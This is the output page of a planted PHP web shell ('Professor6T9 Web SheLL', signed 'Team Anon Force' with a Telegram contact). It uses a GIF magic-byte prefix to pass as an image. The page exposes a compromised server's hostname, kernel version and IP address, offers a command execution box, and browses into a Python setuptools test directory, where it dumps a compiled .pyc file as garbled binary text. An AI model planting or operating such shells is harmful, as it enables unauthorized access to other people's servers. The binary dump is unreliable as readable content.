GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host71.registrar-servers.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Apache
199.188.205.61
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
setuptools
/
tests
/
__pycache__
[ HOME ]
Exec
Submit
File Name : test_dist_info.cpython-311.pyc
� ,|oi| � �� � d Z ddlZddlZddlZddlZddlZddlmZ ddlZddl m Z ddlmZ eej j d�� � Z G d � d � � Z G d� d� � Zd � Zd� ZdS )z$Test .dist-info style distributions.� N)�partial)�unpack_archive� )�DALS�utf-8��encodingc �b � e Zd Zd� Zd� Zej � dd� � d� � � ZdS )�TestDistInfoc �L � d}|dz � |d�� � t j dt j t j z � � }t d|d�� � }|j sJ �|� |j � � sJ �t |� d � � � � rJ �d S )zA Supplying an invalid version crashes dist_info. z@[metadata] name=proj version=42 [egg_info] tag_build=invalid!!! � setup.cfgr r zinvalid version� dist_infoF)�cwd�check�*.dist-infoN)� write_text�re�compile�M�I�run_command_inner� returncode�search�stdout�list�glob)�self�tmp_path�config�msg�procs �q/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/setuptools/tests/test_dist_info.py�test_invalid_versionz!TestDistInfo.test_invalid_version s� � � Y�� �K� �+�+�F�W�+�E�E�E��j�*�B�D�2�4�K�8�8�� ��(�%�H�H�H��������z�z�$�+�&�&�&�&�&��� � �m�4�4�5�5�5�5�5�5�5� c �� � d}|dz � |d�� � t t dd|�� � � � t |� d� � � � }|j � d � � sJ �t j |� � t t dd d|�� � � � t |� d� � � � }|j � d� � sJ �d S ) Nz [metadata] name=proj version=42 [egg_info] tag_date=1 tag_build=.post r r r r z --no-date�r r zproj-42z--tag-buildz.azproj-42a) r �print�run_command�nextr �name� startswith�shutil�rmtree)r r r r s r"